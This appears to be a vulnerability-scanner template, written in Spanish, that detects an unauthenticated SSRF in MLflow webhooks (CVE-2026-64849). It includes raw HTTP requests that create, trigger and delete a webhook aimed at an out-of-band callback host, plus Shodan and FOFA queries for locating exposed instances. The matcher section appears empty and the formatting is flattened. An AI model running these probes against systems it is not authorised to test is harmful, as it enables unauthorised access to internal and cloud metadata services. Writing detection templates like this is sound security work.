
Detecta el SSRF no autenticado en webhooks de MLflow (CVE-2026-64849) que accede a servicios de metadatos internos o en la nube y filtra los detalles de la respuesta eludiendo la redirección.
id: CVE-2026-64849
info: name: MLflow Webhook SSRF - Lectura completa no autenticada mediante bypass de redirección author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0 contiene una vulnerabilidad de divulgación de información causada por una validación incorrecta de las URL de los webhooks, lo que permite a los atacantes alcanzar servicios internos o de metadatos en la nube y obtener detalles de la respuesta. La explotación requiere acceso no autenticado al endpoint de prueba del webhook. impact: | Los atacantes pueden acceder a servicios internos o de metadatos en la nube y recuperar el estado y el cuerpo de la respuesta, exponiendo potencialmente información sensible. remediation: | Actualice MLflow a una versión que contenga el PR #24258, que añade SSRFProtectedHTTPAdapter para la validación de IP en el momento de la conexión, cubriendo los destinos de redirección y el DNS rebinding. reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev
variables: random: "{{rand_text_alpha(8)}}"
http:
raw:
| POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}
| POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}
| DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers:
type: word part: body_1 words:
type: word part: interactsh_protocol words:
extractors: